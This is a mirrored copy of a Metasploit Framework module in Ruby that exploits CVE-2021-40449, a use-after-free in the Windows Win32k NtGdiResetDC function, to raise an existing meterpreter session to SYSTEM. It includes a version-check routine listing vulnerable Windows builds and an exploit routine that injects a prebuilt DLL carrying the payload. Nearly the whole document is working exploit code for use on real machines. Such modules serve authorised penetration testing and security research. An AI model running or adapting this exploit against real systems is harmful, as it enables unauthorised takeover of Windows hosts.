Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/local/cve_2021_40449.rb
29291 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = GoodRanking

8


9
  include Msf::Post::File

10
  include Msf::Post::Windows::Priv

11
  include Msf::Post::Windows::Version

12
  include Msf::Post::Windows::Process

13
  include Msf::Post::Windows::ReflectiveDLLInjection

14
  prepend Msf::Exploit::Remote::AutoCheck

15


16
  def initialize(info = {})

17
    super(

18
      update_info(

19
        info,

20
        {

21
          'Name' => 'Win32k NtGdiResetDC Use After Free Local Privilege Elevation',

22
          'Description' => %q{

23
            A use after free vulnerability exists in the `NtGdiResetDC()` function of Win32k which can be leveraged by

24
            an attacker to escalate privileges to those of `NT AUTHORITY\SYSTEM`. The flaw exists due to the fact

25
            that this function calls `hdcOpenDCW()`, which performs a user mode callback. During this callback, attackers

26
            can call the `NtGdiResetDC()` function again with the same handle as before, which will result in the PDC object

27
            that is referenced by this handle being freed. The attacker can then replace the memory referenced by the handle

28
            with their own object, before passing execution back to the original `NtGdiResetDC()` call, which will now use the

29
            attacker's object without appropriate validation. This can then allow the attacker to manipulate the state of the

30
            kernel and, together with additional exploitation techniques, gain code execution as NT AUTHORITY\SYSTEM.

31


32
            This module has been tested to work on Windows 10 x64 RS1 (build 14393) and RS5 (build 17763), however previous versions

33
            of Windows 10 will likely also work.

34
          },

35
          'License' => MSF_LICENSE,

36
          'Author' => [

37
            'IronHusky', # APT Group who exploited this in the wild

38
            'Costin Raiu', # Initial reporting on bug at SecureList

39
            'Boris Larin', # Initial reporting on bug at SecureList

40
            "Red Raindrop Team of Qi'anxin Threat Intelligence Center", # detailed analysis report in Chinese showing how to replicate the vulnerability

41
            'KaLendsi', # First Public POC targeting Windows 10 build 14393 only, later added support for 17763

42
            'ly4k', # GitHub POC adding support for Windows 10 build 17763, PoC used for this module.

43
            'Grant Willcox' # metasploit module

44
          ],

45
          'Platform' => 'win',

46
          'SessionTypes' => [ 'meterpreter' ],

47
          'DefaultOptions' => {

48
            'EXITFUNC' => 'thread'

49
          },

50
          'Targets' => [

51
            [ 'Windows 10 x64 RS1 (build 14393) and RS5 (build 17763)', { 'Arch' => ARCH_X64 } ]

52
          ],

53
          'Payload' => {

54
            'DisableNops' => true

55
          },

56
          'References' => [

57
            [ 'CVE', '2021-40449' ],

58
            [ 'URL', 'https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/' ], # Initial report of in the wild exploitation

59
            [ 'URL', 'https://mp.weixin.qq.com/s/AcFS0Yn9SDuYxFnzbBqhkQ' ], # Detailed writeup

60
            [ 'URL', 'https://github.com/KaLendsi/CVE-2021-40449-Exploit' ], # First public PoC

61
            [ 'URL', 'https://github.com/ly4k/CallbackHell' ] # Updated PoC this module uses for exploitation.

62
          ],

63
          'DisclosureDate' => '2021-10-12',

64
          'DefaultTarget' => 0,

65
          'Notes' => {

66
            'Stability' => [ CRASH_OS_RESTARTS, ],

67
            'Reliability' => [ REPEATABLE_SESSION, ],

68
            'SideEffects' => []

69
          }

70
        }

71
      )

72
    )

73
  end

74


75
  def check

76
    if session.platform != 'windows'

77
      # Non-Windows systems are definitely not affected.

78
      return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')

79
    end

80


81
    version = get_version_info

82
    unless version.build_number.between?(Msf::WindowsVersion::Server2008_SP0, Msf::WindowsVersion::Win10_21H1) ||

83
           version.build_number == Msf::WindowsVersion::Server2022 ||

84
           version.build_number == Msf::WindowsVersion::Win11_21H2

85
      return CheckCode::Safe('Target is not running a vulnerable version of Windows!')

86
    end

87


88
    # Build numbers taken from https://www.qualys.com/research/security-alerts/2021-10-12/microsoft/

89
    if version.build_number == Msf::WindowsVersion::Win11_21H2 && version.revision_number.between?(0, 257)

90
      return CheckCode::Appears('Vulnerable Windows 11 build detected!')

91
    elsif version.build_number == Msf::WindowsVersion::Server2022 && version.revision_number.between?(0, 287)

92
      return CheckCode::Appears('Vulnerable Windows Server 2022 build detected!')

93
    elsif version.build_number == Msf::WindowsVersion::Win10_21H2 && version.revision_number.between?(0, 1318)

94
      return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')

95
    elsif version.build_number == Msf::WindowsVersion::Win10_21H1 && version.revision_number.between?(0, 1287)

96
      return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')

97
    elsif version.build_number == Msf::WindowsVersion::Win10_20H2 && version.revision_number.between?(0, 1287)

98
      return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')

99
    elsif version.build_number == Msf::WindowsVersion::Win10_2004 && version.revision_number.between?(0, 1287)

100
      return CheckCode::Appears('Vulnerable Windows 10 20H1 build detected!')

101
    elsif version.build_number == Msf::WindowsVersion::Win10_1909 && version.revision_number.between?(0, 1853)

102
      return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')

103
    elsif version.build_number == Msf::WindowsVersion::Win10_1903

104
      return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')

105
    elsif version.build_number == Msf::WindowsVersion::Win10_1809 && version.revision_number.between?(0, 2236)

106
      return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')

107
    elsif version.build_number == Msf::WindowsVersion::Win10_1803

108
      return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')

109
    elsif version.build_number == Msf::WindowsVersion::Win10_1709

110
      return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')

111
    elsif version.build_number == Msf::WindowsVersion::Win10_1703

112
      return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')

113
    elsif version.build_number == Msf::WindowsVersion::Win10_1607 && version.revision_number.between?(0, 4703)

114
      return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')

115
    elsif version.build_number == Msf::WindowsVersion::Win10_1511

116
      return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')

117
    elsif version.build_number == Msf::WindowsVersion::Win10_1507 && version.revision_number.between?(0, 19085)

118
      return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')

119
    elsif version.build_number == Msf::WindowsVersion::Win81 # Includes Server 2012 R2

120
      return CheckCode::Detected('Windows 8.1/Windows Server 2012 R2 build detected!')

121
    elsif version.build_number == Msf::WindowsVersion::Win8 # Includes Server 2012

122
      return CheckCode::Detected('Windows 8/Windows Server 2012 build detected!')

123
    elsif version.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win7_SP1) # Includes Server 2008 R2

124
      return CheckCode::Detected('Windows 7/Windows Server 2008 R2 build detected!')

125
    elsif version.build_number.between?(Msf::WindowsVersion::Server2008_SP0, Msf::WindowsVersion::Server2008_SP2_Update)

126
      return CheckCode::Detected('Windows Server 2008/Windows Server 2008 SP2 build detected!')

127
    else

128
      return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')

129
    end

130
  end

131


132
  def exploit

133
    if is_system?

134
      fail_with(Failure::None, 'Session is already elevated')

135
    end

136


137
    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86

138
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')

139
    elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86

140
      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')

141
    elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64

142
      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')

143
    end

144


145
    encoded_payload = payload.encoded

146
    execute_dll(

147
      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-40449', 'CVE-2021-40449.x64.dll'),

148
      [encoded_payload.length].pack('I<') + encoded_payload

149
    )

150


151
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')

152
  end

153
end

154


155